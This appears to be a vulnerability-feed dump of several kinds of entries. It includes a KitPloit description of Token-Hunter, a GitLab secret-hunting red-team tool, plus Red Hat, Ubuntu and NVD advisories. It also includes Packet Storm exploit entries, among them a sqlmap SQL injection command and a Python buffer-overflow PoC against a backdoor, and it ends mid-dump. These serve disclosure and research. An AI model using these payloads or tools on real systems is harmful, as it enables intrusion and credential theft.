\n\n \n** Usage ** \n\n\nBefore running the tool, you will need to [ generate a GitLab Personal ](<https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html> \"generate a GitLab Personal\" ) [ Access Token ](<https://www.kitploit.com/search/label/Access%20Token> \"Access Token\" ) (PAT) and export it as an environment variable. This can be done as shown below (please select ` api ` in the ` scopes ` section): \n \n \n export GITLAB_API_TOKEN=xxxxx \n \n\nNext, clone the repository and install dependencies with: \n \n \n git clone https://gitlab.com/gitlab-com/gl-security/gl-redteam/token-hunter.git \n pip3 install -r ./requirements.txt \n \n\nThen, you can run the tool and specify your options as follows: \n \n \n usage: token-hunter.py [-h] -g GROUP [-u URL] [-m] [-s] [-i] [-r] [-t] \n [-p PROXY] [-c CERT] [-l LOGFILE] \n \n Collect OSINT for GitLab groups and members. Optionally search the group and \n group members snippets, project issues, and issue discussions/comments for \n sensitive data. \n \n optional arguments: \n -h, --help show this help message and exit \n -u URL, --url URL An optional argument to specify the base URL of your \n GitLab instance. If the argument is not supplied, its \n defaulted to 'https://gitlab.com' \n -m, --members Include group members personal projects and their \n related assets in the searchfor sensitive data. \n -s, --snippets Searches found projects for GitLab Snippets with \n sensitive data. \n -i, --issues Searches found projects for GitLab Issues and \n discussions/comments with sensitive data. \n -r, --mergerequests Searches found projects for GitLab Merge Requests and \n discussions/comments with sensitive data. 
\n -t, --timestamp Disables display of start/finish times and originating \n IP to the output \n -p PROXY, --proxy PROXY \n Proxies all requests using the provided URI matching \n the scheme: http(s)://user:[email\u00a0protected]:8000 \n -c CERT, --cert CERT Used in tandem with -p (--proxy), this switch provides \n a fully qualified path to a certificate to verify TLS \n connections. Provide a fully qualified path to the \n [dynamic](<https://www.kitploit.com/search/label/Dynamic> \"dynamic\" ) cert. Example: \n /Users/<username>/owasp_zap_root_ca.cer. \n -l LOGFILE, --logfile LOGFILE \n Will APPEND all output to specified file. \n \n required arguments: \n -g GROUP, --group GROUP \n ID or HTML encoded name of a GitLab group. This \n option, by itself, will display group projects and \n member names only. \n \n\n \n** Usage Examples ** \n\n\n` ./token-hunter.py -g 123456 `\n\nThe simplest use case is to return all the project URLs associated with a group by providing the group ID with the ` -g ` switch. You can find the group ID underneath the group name in the GitLab UI. No token searches are performed with this configuration. \n\n` ./token-hunter.py -g 123456 -m `\n\nFinds all projects for group 123456 as well as all of the personal projects for the group members. No token searches are performed with this configuration. \n\n` ./token-hunter.py -g 123456 -ms `\n\nFinds all projects for group 123456 as well as all of the personal projects for the group members. The ` -s ` switch tells Token-Hunter to search GitLab snippets associated with each found project for sensitive data. \n\n` ./token-hunter.py -g 123456 -msir `\n\nFinds all projects for group 123456 as well as all of the personal projects for the group members. The ` -s ` switch tells Token-Hunter to search GitLab snippets associated with each found project for sensitive data. The ` -i ` switch tells Token-Hunter to also search issues and discussions for each of the found projects for sensitive data. 
The ` -r ` switch tells Token-Hunter to also search merge requests and merge request discussions for each of the found projects. ** CAUTION: ** This configuration has the potential to pull a lot of data! \n\n` ./token-hunter.py -g 123456 -msit -u https://mygitlab-instance.com -p http://127.0.01:8080 -c /Users/hacker/owasp_zap_ca_cert.cer -l ./appended-output.txt `\n\nPerforms the same asset searches as the previous example against a self-hosted installation of GitLab running at ` https://mygitlab-instance.com ` . Requests and responses that the tool generates are proxied through ` http://127.0.01:8080 ` using the certificate defined at the fully qualified path ` /Users/hacker/owasp_zap_ca_cert.cer ` to decrypt the TLS traffic. Timestamps and origin IP are excluded from the output with the ` -t ` switch. Output is _ APPENDED _ to the ` ./appended-output.txt ` file with the ` -l ` switch. \n\n \n** Contributing ** \n\n\nContributions are welcome from the community. You can find and add to the issue list, submit merge requests, and add to the existing discussions. Token-Hunter is written in Python 3. To make a code contribution: \n\n 1. [ Install python version 3 ](<https://realpython.com/installing-python/> \"Install python version 3\" )\n 2. Install pip version 3 to manage dependencies using the guide above. \n 3. Clone the repository \n 4. In the root directory, install dependencies with ` pip3 install -r ./requirements.txt `\n 5. [ Create a branch ](<https://docs.gitlab.com/ee/gitlab-basics/create-branch.html> \"Create a branch\" ) for the changes you'd like to make. \n 6. Modify or add test coverage in the existing ` ./test_* ` files, adding new files as needed. \n 7. Execute tests, written in [ pytest ](<http://doc.pytest.org/> \"pytest\" ) , with ` pytest -v ` to make sure they pass. \n 8. Create a merge request for your changes and tag ` @gitlab-red-team ` to review and merge it. \n 9. Repeat! 
\n \n \n\n\n** [ Download Token-Hunter ](<https://github.com/codeEmitter/token-hunter> \"Download Token-Hunter\" ) **\n", "edition": 1, "modified": "2021-01-18T11:30:06", "published": "2021-01-18T11:30:06", "id": "KITPLOIT:7822299295723551865", "href": "http://www.kitploit.com/2021/01/token-hunter-collect-osint-for-gitlab.html", "title": "Token-Hunter - Collect OSINT For GitLab Groups And Members And Search The Group And Group Members' Snippets, Issues, And Issue Discussions For Sensitive Data That May Be Included In These Assets", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2021-01-18T16:39:44", "bulletinFamily": "unix", "cvelist": ["CVE-2020-2304", "CVE-2020-2305", "CVE-2020-2306", "CVE-2020-2307", "CVE-2020-2308", "CVE-2020-2309", "CVE-2020-28362"], "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks (CVE-2020-2304)\n\n* jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks (CVE-2020-2305)\n\n* jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information disclosure (CVE-2020-2306)\n\n* jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin (CVE-2020-2307)\n\n* jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates (CVE-2020-2308)\n\n* jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials IDs (CVE-2020-2309)\n\n* golang: math/big: panic during recursive division of very large numbers (CVE-2020-28362)\n\nThis advisory contains the RPM packages for Red Hat OpenShift Container\nPlatform 4.6.12. 
See the following advisory for the container images for\nthis release:\n\nhttps://access.redhat.com/errata/RHSA-2021:0037\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAll OpenShift Container Platform 4.6 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.6/updating/updating-cluster-between-minor.html#understanding-upgrade-channels_updating-cluster-between-minor.", "modified": "2021-01-18T19:54:54", "published": "2021-01-18T19:49:09", "id": "RHSA-2021:0038", "href": "https://access.redhat.com/errata/RHSA-2021:0038", "type": "redhat", "title": "(RHSA-2021:0038) Important: OpenShift Container Platform 4.6.12 packages and security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-18T16:40:41", "bulletinFamily": "unix", "cvelist": ["CVE-2019-10130", "CVE-2019-10208", "CVE-2020-14350", "CVE-2020-1720", "CVE-2020-25694", "CVE-2020-25695", "CVE-2020-25696"], "description": "PostgreSQL is an advanced object-relational database management system (DBMS).\n\nThe following packages have been upgraded to a later upstream version: postgresql (9.6.20).\n\nSecurity Fix(es):\n\n* postgresql: Reconnection can downgrade connection security settings (CVE-2020-25694)\n\n* postgresql: Multiple features escape \"security restricted operation\" sandbox (CVE-2020-25695)\n\n* postgresql: TYPE in pg_temp executes arbitrary SQL during SECURITY DEFINER execution (CVE-2019-10208)\n\n* postgresql: Uncontrolled search path element in CREATE EXTENSION (CVE-2020-14350)\n\n* postgresql: psql's \\gset allows overwriting specially treated variables 
(CVE-2020-25696)\n\n* postgresql: Selectivity estimators bypass row security policies (CVE-2019-10130)\n\n* postgresql: ALTER ... DEPENDS ON EXTENSION is missing authorization checks (CVE-2020-1720)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-18T21:08:50", "published": "2021-01-18T15:05:40", "id": "RHSA-2021:0167", "href": "https://access.redhat.com/errata/RHSA-2021:0167", "type": "redhat", "title": "(RHSA-2021:0167) Important: postgresql:9.6 security update", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-18T16:38:43", "bulletinFamily": "unix", "cvelist": ["CVE-2019-10130", "CVE-2019-10164", "CVE-2019-10208", "CVE-2020-14349", "CVE-2020-14350", "CVE-2020-1720", "CVE-2020-25694", "CVE-2020-25695", "CVE-2020-25696"], "description": "PostgreSQL is an advanced object-relational database management system (DBMS).\n\nThe following packages have been upgraded to a later upstream version: postgresql (10.15).\n\nSecurity Fix(es):\n\n* postgresql: Reconnection can downgrade connection security settings (CVE-2020-25694)\n\n* postgresql: Multiple features escape \"security restricted operation\" sandbox (CVE-2020-25695)\n\n* postgresql: Stack-based buffer overflow via setting a password (CVE-2019-10164)\n\n* postgresql: TYPE in pg_temp executes arbitrary SQL during SECURITY DEFINER execution (CVE-2019-10208)\n\n* postgresql: Uncontrolled search path element in logical replication (CVE-2020-14349)\n\n* postgresql: Uncontrolled search path element in CREATE EXTENSION (CVE-2020-14350)\n\n* postgresql: psql's \\gset allows overwriting specially treated variables (CVE-2020-25696)\n\n* postgresql: Selectivity estimators bypass row security policies (CVE-2019-10130)\n\n* postgresql: ALTER ... 
DEPENDS ON EXTENSION is missing authorization checks (CVE-2020-1720)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-18T21:08:45", "published": "2021-01-18T15:02:33", "id": "RHSA-2021:0166", "href": "https://access.redhat.com/errata/RHSA-2021:0166", "type": "redhat", "title": "(RHSA-2021:0166) Important: postgresql:10 security update", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-18T10:41:47", "bulletinFamily": "unix", "cvelist": ["CVE-2019-10130", "CVE-2019-10208", "CVE-2020-14350", "CVE-2020-1720", "CVE-2020-25694", "CVE-2020-25695", "CVE-2020-25696"], "description": "PostgreSQL is an advanced object-relational database management system (DBMS).\n\nThe following packages have been upgraded to a later upstream version: postgresql (9.6.20).\n\nSecurity Fix(es):\n\n* postgresql: Reconnection can downgrade connection security settings (CVE-2020-25694)\n\n* postgresql: Multiple features escape \"security restricted operation\" sandbox (CVE-2020-25695)\n\n* postgresql: TYPE in pg_temp executes arbitrary SQL during SECURITY DEFINER execution (CVE-2019-10208)\n\n* postgresql: Uncontrolled search path element in CREATE EXTENSION (CVE-2020-14350)\n\n* postgresql: psql's \\gset allows overwriting specially treated variables (CVE-2020-25696)\n\n* postgresql: Selectivity estimators bypass row security policies (CVE-2019-10130)\n\n* postgresql: ALTER ... 
DEPENDS ON EXTENSION is missing authorization checks (CVE-2020-1720)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-18T14:46:33", "published": "2021-01-18T14:18:50", "id": "RHSA-2021:0164", "href": "https://access.redhat.com/errata/RHSA-2021:0164", "type": "redhat", "title": "(RHSA-2021:0164) Important: postgresql:9.6 security update", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-18T10:38:36", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14349", "CVE-2020-14350", "CVE-2020-1720", "CVE-2020-25694", "CVE-2020-25695", "CVE-2020-25696"], "description": "PostgreSQL is an advanced object-relational database management system (DBMS).\n\nThe following packages have been upgraded to a later upstream version: postgresql (12.5).\n\nSecurity Fix(es):\n\n* postgresql: Reconnection can downgrade connection security settings (CVE-2020-25694)\n\n* postgresql: Multiple features escape \"security restricted operation\" sandbox (CVE-2020-25695)\n\n* postgresql: Uncontrolled search path element in logical replication (CVE-2020-14349)\n\n* postgresql: Uncontrolled search path element in CREATE EXTENSION (CVE-2020-14350)\n\n* postgresql: psql's \\gset allows overwriting specially treated variables (CVE-2020-25696)\n\n* postgresql: ALTER ... 
DEPENDS ON EXTENSION is missing authorization checks (CVE-2020-1720)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-18T14:44:21", "published": "2021-01-18T14:18:11", "id": "RHSA-2021:0163", "href": "https://access.redhat.com/errata/RHSA-2021:0163", "type": "redhat", "title": "(RHSA-2021:0163) Important: postgresql:12 security update", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-18T10:39:52", "bulletinFamily": "unix", "cvelist": ["CVE-2020-25694", "CVE-2020-25695", "CVE-2020-25696"], "description": "PostgreSQL is an advanced object-relational database management system (DBMS).\n\nThe following packages have been upgraded to a later upstream version: postgresql (10.15).\n\nSecurity Fix(es):\n\n* postgresql: Reconnection can downgrade connection security settings (CVE-2020-25694)\n\n* postgresql: Multiple features escape \"security restricted operation\" sandbox (CVE-2020-25695)\n\n* postgresql: psql's \\gset allows overwriting specially treated variables (CVE-2020-25696)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-18T14:36:11", "published": "2021-01-18T14:12:23", "id": "RHSA-2021:0161", "href": "https://access.redhat.com/errata/RHSA-2021:0161", "type": "redhat", "title": "(RHSA-2021:0161) Important: postgresql:10 security update", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-18T10:40:43", "bulletinFamily": "unix", "cvelist": ["CVE-2020-16044"], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 78.6.1.\n\nSecurity Fix(es):\n\n* Mozilla: Use-after-free write when handling a 
malicious COOKIE-ECHO SCTP chunk (CVE-2020-16044)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-18T14:23:58", "published": "2021-01-18T14:11:42", "id": "RHSA-2021:0160", "href": "https://access.redhat.com/errata/RHSA-2021:0160", "type": "redhat", "title": "(RHSA-2021:0160) Critical: thunderbird security update", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2021-01-19T12:37:56", "description": "An issue was discovered in Open Design Alliance Drawings SDK before 2021.11. A NULL pointer dereference exists when rendering malformed .DXF and .DWG files. This can allow attackers to cause a crash, potentially enabling a denial of service attack (Crash, Exit, or Restart). This is issue 1 of 3.", "edition": 1, "cvss3": {}, "published": "2021-01-18T08:15:00", "title": "CVE-2021-25175", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-25175"], "modified": "2021-01-18T08:15:00", "cpe": [], "id": "CVE-2021-25175", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25175", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "ubuntu": [{"lastseen": "2021-01-18T21:49:48", "bulletinFamily": "unix", "cvelist": ["CVE-2020-35654", "CVE-2020-35655", "CVE-2020-35653"], "description": "It was discovered that Pillow incorrectly handled certain PCX image files. \nIf a user or automated system were tricked into opening a specially-crafted \nPCX file, a remote attacker could possibly cause Pillow to crash, \nresulting in a denial of service. (CVE-2020-35653)\n\nIt was discovered that Pillow incorrectly handled certain Tiff image files. \nIf a user or automated system were tricked into opening a specially-crafted \nTiff file, a remote attacker could cause Pillow to crash, resulting in a \ndenial of service, or possibly execute arbitrary code. 
This issue only \naffected Ubuntu 20.04 LTS and Ubuntu 20.10. (CVE-2020-35654)\n\nIt was discovered that Pillow incorrectly handled certain SGI image files. \nIf a user or automated system were tricked into opening a specially-crafted \nSGI file, a remote attacker could possibly cause Pillow to crash, \nresulting in a denial of service. This issue only affected Ubuntu 18.04 \nLTS, Ubuntu 20.04 LTS, and Ubuntu 20.10. (CVE-2020-35655)", "edition": 1, "modified": "2021-01-18T00:00:00", "published": "2021-01-18T00:00:00", "id": "USN-4697-1", "href": "https://ubuntu.com/security/notices/USN-4697-1", "title": "Pillow vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-18T17:53:42", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5332", "CVE-2017-6011", "CVE-2017-5333", "CVE-2017-5208", "CVE-2017-6010", "CVE-2017-6009", "CVE-2017-5331"], "description": "Choongwoo Han discovered that icoutils incorrectly handled certain files. \nAn attacker could possibly use this issue to cause a denial of service \nor execute arbitrary code. (CVE-2017-5208)\n\nIt was discovered that icoutils incorrectly handled certain files. \nAn attacker could possibly use this issue to cause a denial of service \nor execute arbitrary code. (CVE-2017-5331, CVE-2017-5332, CVE-2017-5333)\n\nJerzy Kramarz discovered that icoutils incorrectly handled certain files. \nAn attacker could possibly use this issue to cause a crash or execute \narbitrary code. (CVE-2017-6009, CVE-2017-6010)\n\nJerzy Kramarz discovered that icoutils incorrectly handled certain files. \nAn attacker could possibly use this issue to expose sensitive information. 
\n(CVE-2017-6011)", "edition": 1, "modified": "2021-01-18T00:00:00", "published": "2021-01-18T00:00:00", "id": "USN-4695-1", "href": "https://ubuntu.com/security/notices/USN-4695-1", "title": "icoutils vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-01-18T16:22:48", "description": "", "published": "2021-01-18T00:00:00", "type": "packetstorm", "title": "Life Insurance Management System 1.0 SQL Injection", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-18T00:00:00", "id": "PACKETSTORM:160980", "href": "https://packetstormsecurity.com/files/160980/Life-Insurance-Management-System-1.0-SQL-Injection.html", "sourceData": "`# Exploit Title: Life Insurance Management System 1.0 - 'client_id' SQL Injection \n# Date: 15/1/2021 \n# Exploit Author: Aitor Herrero \n# Vendor Homepage: https://www.sourcecodester.com \n# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html \n# Version: 1.0 \n# Tested on: Windows /linux / \n \nLogin in the application \n \nGo to clientStatus.php?client_id= \n \nsqlmap -u \"http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1 \n<http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129%27%20and%20sleep(20)%20and%20%271%27=%271>\" \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/160980/lims10-sql.txt"}, {"lastseen": "2021-01-18T16:24:37", "description": "", "published": "2021-01-18T00:00:00", "type": "packetstorm", "title": "Backdoor.Win32.Latinus.b Remote Buffer Overflow", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-18T00:00:00", "id": "PACKETSTORM:160977", "href": "https://packetstormsecurity.com/files/160977/Backdoor.Win32.Latinus.b-Remote-Buffer-Overflow.html", "sourceData": "`Discovery / credits: Malvuln - malvuln.com (c) 2021 
\nOriginal source: https://malvuln.com/advisory/9adffcc98cd658a7f9c5419480013f72.txt \nContact: malvuln13@gmail.com \nMedia: twitter.com/malvuln \n \nThreat: Backdoor.Win32.Latinus.b \nVulnerability: Remote Buffer Overflow \nDescription: Malware listens on both TCP ports 11831 and 29559, by sending an HTTP OPTIONS request with about 8945 bytes we trigger buffer overflow and overwriting stack registers. \nType: PE32 \nMD5: 9adffcc98cd658a7f9c5419480013f72 \nVuln ID: MVID-2021-0029 \nDropped files: msHtml.exe \nASLR: False \nDEP: False \nSafe SEH: True \nDisclosure: 01/15/2021 \n \nMemory Dump: \nEAX : 41414141 \nEBX : 040C91C0 \nECX : 41414141 \nEDX : 040C7020 \nEBP : 0046B614 mshtml.0046B614 \nESP : 000A1494 \nESI : 00000014 \nEDI : 0046B610 mshtml.0046B610 \nEIP : 00401C78 mshtml.00401C78 \n \nThis dump file has an exception of interest stored in it. \nThe stored exception information can be accessed via .ecxr. \n(1534.17c0): Access violation - code c0000005 (first/second chance not available) \neax=41414141 ebx=04138948 ecx=41414141 edx=41414141 esi=00000014 edi=0046b610 \neip=00401c76 esp=000a1644 ebp=0046b614 iopl=0 nv up ei pl nz na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 \n*** WARNING: Unable to verify checksum for msHtml.exe \n*** ERROR: Module load completed but symbols could not be loaded for msHtml.exe \nmsHtml+0x1c76: \n00401c76 8902 mov dword ptr [edx],eax ds:002b:41414141=???????? 
\n \n \n0:000> !analyze -v \n******************************************************************************* \n* * \n* Exception Analysis * \n* * \n******************************************************************************* \n \nFailed calling InternetOpenUrl, GLE=12029 \n \nFAULTING_IP: \nmsHtml+1c76 \n00401c76 8902 mov dword ptr [edx],eax \n \nEXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) \nExceptionAddress: 00401c76 (msHtml+0x00001c76) \nExceptionCode: c0000005 (Access violation) \nExceptionFlags: 00000000 \nNumberParameters: 2 \nParameter[0]: 00000001 \nParameter[1]: 41414141 \nAttempt to write to address 41414141 \n \nPROCESS_NAME: msHtml.exe \n \nOVERLAPPED_MODULE: Address regions for 'comctl32_72d50000' and 'dataexchange.dll' overlap \n \nERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. \n \nEXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. \n \nEXCEPTION_PARAMETER1: 00000001 \n \nEXCEPTION_PARAMETER2: 41414141 \n \nWRITE_ADDRESS: 41414141 \n \nFOLLOWUP_IP: \nmsHtml+1c76 \n00401c76 8902 mov dword ptr [edx],eax \n \nMOD_LIST: <ANALYSIS/> \n \nNTGLOBALFLAG: 0 \n \nAPPLICATION_VERIFIER_FLAGS: 0 \n \nFAULTING_THREAD: 000017c0 \n \nBUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_41414141 \n \nPRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_41414141 \n \nDEFAULT_BUCKET_ID: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_41414141 \n \nIP_ON_HEAP: 04144b5c \nThe fault address in not in any loaded module, please check your build's rebase \nlog at <releasedir>\\bin\\build_logs\\timebuild\\ntrebase.log for module which may \ncontain the address if it were loaded. \n \nFRAME_ONE_INVALID: 1 \n \nLAST_CONTROL_TRANSFER: from 04144b5c to 00401c76 \n \nSTACK_TEXT: \nWARNING: Stack unwind information not available. Following frames may be wrong. 
\n0046b614 04144b5c 027b87b0 027b9da4 027b9da4 msHtml+0x1c76 \n0046b618 027b87b0 027b9da4 027b9da4 00000000 0x4144b5c \n0046b61c 027b9da4 027b9da4 00000000 00000000 0x27b87b0 \n0046b620 027b9da4 00000000 00000000 00000000 0x27b9da4 \n0046b624 00000000 00000000 00000000 0019ff74 0x27b9da4 \n \n \nSTACK_COMMAND: ~0s; .ecxr ; kb \n \nSYMBOL_STACK_INDEX: 0 \n \nSYMBOL_NAME: msHtml+1c76 \n \nFOLLOWUP_NAME: MachineOwner \n \nMODULE_NAME: msHtml \n \nIMAGE_NAME: msHtml.exe \n \nDEBUG_FLR_IMAGE_TIMESTAMP: 2a425e19 \n \nFAILURE_BUCKET_ID: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_msHtml.exe!Unknown \n \nBUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_41414141_msHtml+1c76 \n \n \nExploit/PoC: \nfrom socket import * \n \nMALWARE_HOST=\"x.x.x.x\" \nPORT=29559 \n \ndef doit(): \ns=socket(AF_INET, SOCK_STREAM) \ns.connect((MALWARE_HOST, PORT)) \nPAYLOAD=\"OPTIONS /\"+\"A\"*8945+ \" HTTP/1.1\\r\\nHost: \"+MALWARE_HOST+\"\\r\\n\\r\\n\" \ns.send(PAYLOAD) \ns.close() \nprint(\"Backdoor.Win32.Latinus.b / Remote Buffer Overflow \") \nprint(\"MD5: 9adffcc98cd658a7f9c5419480013f72\") \nprint(\"By Malvuln\") \n \nif __name__==\"__main__\": \ndoit() \n \n \nDisclaimer: The information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/160977/MVID-2021-0029.txt"}, {"lastseen": "2021-01-18T16:20:09", "description": "", "published": "2021-01-18T00:00:00", "type": "packetstorm", "title": "Backdoor.Win32.Whgrx Remote Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-18T00:00:00", "id": "PACKETSTORM:160983", "href": "https://packetstormsecurity.com/files/160983/Backdoor.Win32.Whgrx-Remote-Stack-Buffer-Overflow.html", "sourceData": "`Discovery / credits: Malvuln - malvuln.com (c) 2021 \nOriginal source: https://malvuln.com/advisory/eb6fd418cd3b52132ffb029b52839edf.txt \nContact: malvuln13@gmail.com \nMedia: twitter.com/malvuln \n \nThreat: Backdoor.Win32.Whgrx \nVulnerability: Remote Host Header Stack Buffer Overflow \nDescription: The specimen listens on datagram UDP port 65000, by sending a specially crafted HTTP PUT request and specifying a large string of characters for the HOST header we trigger the buffer overflow overwriting stack registers. Upon running the malware it may display a \"Cannot load shared library wsocx.dll\" message but still runs normally. The exploit payload specifies both 41414141 and 42424242 pattern with 42424242 overwriting SEH and ECX register, the 42424242 pattern was target the HTTP HOST header. \nType: PE32 \nMD5: eb6fd418cd3b52132ffb029b52839edf \nVuln ID: MVID-2021-0030 \nDropped files: \nASLR: False \nDEP: False \nSafe SEH: True \nDisclosure: 01/16/2021 \n \nMemory Dump: \nThis dump file has an exception of interest stored in it. \nThe stored exception information can be accessed via .ecxr. 
\n(1bb4.176c): Access violation - code c0000005 (first/second chance not available) \neax=00000000 ebx=00000000 ecx=42424242 edx=773e9d70 esi=042c1840 edi=042c1d04 \neip=773ce916 esp=042c1788 ebp=042c1828 iopl=0 nv up ei pl nz na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 \nntdll!ZwQueryInformationProcess+0x26: \n773ce916 c21400 ret 14h \n \n \n0:002> !analyze -v \n******************************************************************************* \n* * \n* Exception Analysis * \n* * \n******************************************************************************* \n \n*** WARNING: Unable to verify checksum for Backdoor.Win32.Whgrx.eb6fd418cd3b52132ffb029b52839edf.exe \n*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Whgrx.eb6fd418cd3b52132ffb029b52839edf.exe \n \nFAULTING_IP: \nBackdoor_Win32_Whgrx_eb6fd418cd3b52132ffb029b52839edf+40a8 \n004040a8 8b4af8 mov ecx,dword ptr [edx-8] \n \nEXCEPTION_RECORD: 043bd8b4 -- (.exr 0x43bd8b4) \nExceptionAddress: 004040a8 (Backdoor_Win32_Whgrx_eb6fd418cd3b52132ffb029b52839edf+0x000040a8) \nExceptionCode: c0000005 (Access violation) \nExceptionFlags: 00000000 \nNumberParameters: 2 \nParameter[0]: 00000000 \nParameter[1]: 4242423a \nAttempt to read from address 4242423a \n \nPROCESS_NAME: Backdoor.Win32.Whgrx.eb6fd418cd3b52132ffb029b52839edf.exe \n \nERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. \n \nEXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. \n \nEXCEPTION_PARAMETER1: 00000001 \n \nEXCEPTION_PARAMETER2: 042c0fe8 \n \nWRITE_ADDRESS: 042c0fe8 \n \nFOLLOWUP_IP: \nkernel32!BaseThreadInitThunk+0 \n76e38630 8bff mov edi,edi \n \nFAILED_INSTRUCTION_ADDRESS: \n+0 \n42424242 ?? ??? 
